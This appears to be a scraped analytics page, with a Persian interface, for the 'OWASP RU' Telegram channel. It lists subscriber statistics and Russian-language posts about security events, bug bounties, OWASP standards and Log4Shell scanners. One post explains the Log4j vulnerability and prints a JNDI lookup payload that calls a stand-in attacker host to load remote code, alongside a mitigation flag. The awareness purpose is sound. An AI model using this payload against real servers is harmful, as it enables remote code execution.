fa
Feedback
OWASP RU

OWASP RU

رفتن به کانال در Telegram
1 047
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
اطلاعاتی وجود ندارد30 روز

در حال بارگیری داده...

کانال‌های مشابه
هیچ داده‌ای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
ابر برچسب‌ها
هیچ داده‌ای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
ژوئیه '23
ژوئیه '23
+5
در 0 کانال‌ها
ژوئن '23
+14
در 0 کانال‌ها
Get PRO
مه '23
+13
در 0 کانال‌ها
Get PRO
آوریل '23
+13
در 0 کانال‌ها
Get PRO
مارس '23
+13
در 0 کانال‌ها
Get PRO
فوریه '23
+14
در 0 کانال‌ها
Get PRO
ژانویه '23
+7
در 0 کانال‌ها
Get PRO
دسامبر '22
+21
در 0 کانال‌ها
Get PRO
نوامبر '22
+16
در 0 کانال‌ها
Get PRO
اکتبر '22
+21
در 0 کانال‌ها
Get PRO
سپتامبر '22
+19
در 0 کانال‌ها
Get PRO
اوت '22
+22
در 0 کانال‌ها
Get PRO
ژوئیه '22
+40
در 0 کانال‌ها
Get PRO
ژوئن '22
+16
در 0 کانال‌ها
Get PRO
مه '22
+23
در 0 کانال‌ها
Get PRO
آوریل '22
+23
در 0 کانال‌ها
Get PRO
مارس '22
+15
در 0 کانال‌ها
Get PRO
فوریه '22
+8
در 0 کانال‌ها
Get PRO
ژانویه '22
+13
در 0 کانال‌ها
Get PRO
دسامبر '21
+11
در 0 کانال‌ها
Get PRO
نوامبر '21
+9
در 0 کانال‌ها
Get PRO
اکتبر '21
+16
در 0 کانال‌ها
Get PRO
سپتامبر '21
+17
در 0 کانال‌ها
Get PRO
اوت '21
+31
در 0 کانال‌ها
Get PRO
ژوئیه '21
+31
در 0 کانال‌ها
Get PRO
ژوئن '21
+10
در 0 کانال‌ها
Get PRO
مه '21
+12
در 0 کانال‌ها
Get PRO
آوریل '21
+15
در 0 کانال‌ها
Get PRO
مارس '21
+30
در 0 کانال‌ها
Get PRO
فوریه '21
+29
در 0 کانال‌ها
Get PRO
ژانویه '21
+20
در 0 کانال‌ها
Get PRO
دسامبر '20
+875
در 0 کانال‌ها
تاریخ
رشد مشترکین
اشارات
کانال‌ها
11 ژوئیه+2
10 ژوئیه0
09 ژوئیه0
08 ژوئیه+1
07 ژوئیه0
06 ژوئیه0
05 ژوئیه+1
04 ژوئیه0
03 ژوئیه0
02 ژوئیه0
01 ژوئیه+1
پست‌های کانال
2
https://habr.com/ru/company/owasp/blog/703322/
1 183
3
https://habr.com/ru/company/owasp/blog/703322/
26
4
https://github.com/OWASP/ASVS/blob/master/4.0/OWASP%20Application%20Security%20Verification%20Standard%204.0.3-ru.pdf за адаптацию и перевод спасибо Андрею Титову
2 646
5
​​В 11.00 стартует мероприятие "«Правильный» пентест — мы выбираем, нас выбирают", успейте зарегистрироваться и принять участие. Обсудим критерии защищенности компаний, как провести пентест «правильно» и кем, какие предпосылки возникновения потребности в тестировании у заказчика. Рассмотрим инструменты для специалистов и грамотное техническое задание для пентестера, а также критерии оценки.
481
6
https://gdspace.ru/talkshow/82
1
7
https://gdspace.ru/talkshow/82
1
8
https://www.zaproxy.org/blog/2021-12-10-zap-and-log4shell/
1 163
9
Log4j2 RCE Passive Scanner plugin for BurpSuite https://github.com/whwlsfb/Log4j2Scan
1 427
10
У половины интернета нашли выполнение произвольного кода через Log4j. Выглядит это так: 1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться. 2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host 3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код. Гроб. Гроб. Кладбище. Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true” Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
944
11
Охота за уязвимостями на ДЭГ-2021 https://bb.gosuslugi.ru официальная Bug Bounty от Госуслуг.
1 096
12
bb.gosuslugi.ru
1
13
YauzaCTF 2021 is a task-based competition that will take place online on August 27-29 at 12:00 (UTC+0). It will give the participants the atmosphere of the Soviet past. For 48 hours, participants will be able to solve tasks of all categories: - web, reverse, pwn, forensics, crypto, OSINT, joy. Also new categories have been added: - hardware, pentest and emulation! The organizers and sponsors of the event have prepared many interesting prizes. More details on the event website. ABOUT EVENT: 🕹 Event website: https://yauzactf.com/en 📃 CTFtime page: https://ctftime.org/event/1417/ 🔑 Competition type: task-based competition 📅 Start: on August 27 at 12:00 (UTC+0) ⏰ Duration: 48 hours 👨‍👨‍👦‍👦 Number of people in the team: maximum 7 people 🥇 Qualification: students from CIS schools or universities (graduating not earlier than 2021) and those, who born not earlier than 1995
516
14
ИБ ДИТ Правительства Москвы: https://www.mos.ru/security.txt
498
15
Правильный подход к безопасности: https://www.gosuslugi.ru/security.txt
1 372
16
Google запускает общую платформу для взаимодействия с багхантерами во всех продуктах компании: https://bughunters.google.com. Также доступен Университет бахгантеров для повышения скиллов: https://bughunters.google.com/learn
2 198
17
https://news.microsoft.com/ru-ru/microsoft-bug-bounty/
1 174
18
https://20thanniversary.owasp.org
1 133
19
vc.ru/dev/267706
1 079
20
https://twitter.com/owasp_moscow/status/1403648589331566595?s=21
741